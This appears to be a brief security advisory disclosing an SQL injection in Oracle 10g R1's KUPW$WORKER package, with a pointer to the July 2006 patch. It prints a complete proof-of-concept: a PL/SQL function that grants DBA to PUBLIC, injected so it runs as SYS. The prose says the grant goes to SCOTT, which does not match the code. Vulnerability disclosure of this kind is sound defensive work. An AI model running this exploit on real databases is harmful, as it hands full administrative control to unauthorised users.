Services
Information
Company |
SQL Injection via Oracle KUPW$WORKER in Oracle 10g R1
Details The following proof of concept exploit code injects a custom PLSQL function. This function is executed in the SYS context and grants the DBA permission to the user SCOTT. Example -- Create a function first and inject this function. The function will be executed as user SYS. CREATE OR REPLACE FUNCTION F return number authid current_user as pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC'; COMMIT; RETURN 1; END; / -- Inject the function in the vulnerable procedure exec sys.kupw$WORKER.main('x','YY'' and 1=d.f -- r6'); Patch Information Apply the patches mentioned in Oracle Critical Patch Update July 2006. © 2005 by Red-Database-Security GmbH - last update 17-nov-2005 |
Definition Exploit |